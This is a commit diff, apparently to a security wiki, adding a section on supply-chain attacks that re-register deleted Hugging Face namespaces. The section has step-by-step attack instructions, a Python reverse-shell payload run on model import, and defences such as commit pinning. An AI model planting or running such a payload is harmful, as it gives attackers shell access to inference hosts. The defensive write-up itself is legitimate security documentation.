You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
## AI/ML Model Registry Supply-Chain Attacks (Hugging Face Namespace Reuse)
424
-
425
-
A systemic weakness in how models are referenced and deployed can be abused across clouds and OSS: many pipelines resolve models by Author/ModelName (e.g., Hugging Face), without pinning to a specific commit or verifying integrity. If an author/org on Hugging Face is deleted, anyone can re-register the same author name and recreate the same ModelName, silently replacing what downstream systems pull when they resolve by name only. Transferred models can also be abused by breaking the old-path redirect if the old author is later deleted and re-registered by an attacker.
426
-
427
-
Key cases on Hugging Face hub:
428
-
- Ownership deletion: old Author/ModelName returns 404 until takeover by a new account that recreates the author and model.
429
-
- Ownership transfer: old Author/ModelName issues 307 to the new author; if the old author is later deleted and re-registered by an attacker, the legacy path resolves to attacker content.
1) Identify reusable namespaces (deleted authors or transferred models whose old author was removed) still referenced by code, defaults, notebooks, docs, or cloud model catalogs.
443
-
2) Re-register the abandoned author on Hugging Face; recreate the same ModelName under that author.
444
-
3) Publish a malicious repo. Ensure model loader executes code on import (e.g., __init__.py side effects, custom modeling_*.py referenced by auto_map). Some loaders require trust_remote_code=True.
445
-
4) Rely on downstream systems that fetch by name only. When they deploy or from_pretrained("Author/ModelName"), the attacker’s code executes inside the target runtime (e.g., cloud inference endpoint container/VM) with that endpoint’s permissions.
446
-
447
-
Payload on load (example):
448
-
449
-
```python
450
-
# __init__.py or a module imported by model loader
451
-
import os, socket, subprocess, threading
452
-
453
-
def_rs(host, port):
454
-
s = socket.socket(); s.connect((host, port))
455
-
for fd in (0,1,2):
456
-
try:
457
-
os.dup2(s.fileno(), fd)
458
-
exceptException:
459
-
pass
460
-
subprocess.call(["/bin/sh","-i"]) # demo purposes only
461
-
462
-
# Gate on an env var if desired
463
-
if os.environ.get("INFERENCE_ENDPOINT","1") =="1":
- Google Vertex AI Model Garden: direct deploy of HF models; hijacked namespaces can yield RCE in the endpoint container when the platform loads attacker repo code.
- Microsoft Azure AI Foundry: Model Catalog includes HF models; hijacked namespaces can yield RCE in the deployed endpoint with that endpoint’s permissions.
- Treat Author/ModelName like any third-party dependency. Continuously scan codebases, defaults, docstrings, comments, model cards, and notebooks for HF identifiers and resolve their current ownership.
482
-
- Pin to a specific commit in loaders to prevent silent replacement:
483
-
484
-
```python
485
-
from transformers import AutoModel
486
-
m = AutoModel.from_pretrained("Author/ModelName", revision="<COMMIT_HASH>")
487
-
```
488
-
489
-
- Clone vetted models to trusted internal registries/artifact stores and reference those in production.
490
-
- Before deploying from cloud model catalogs, verify the current author and provenance of the referenced HF model. Be aware that catalog verifications can drift if upstream authors are deleted/re-registered.
0 commit comments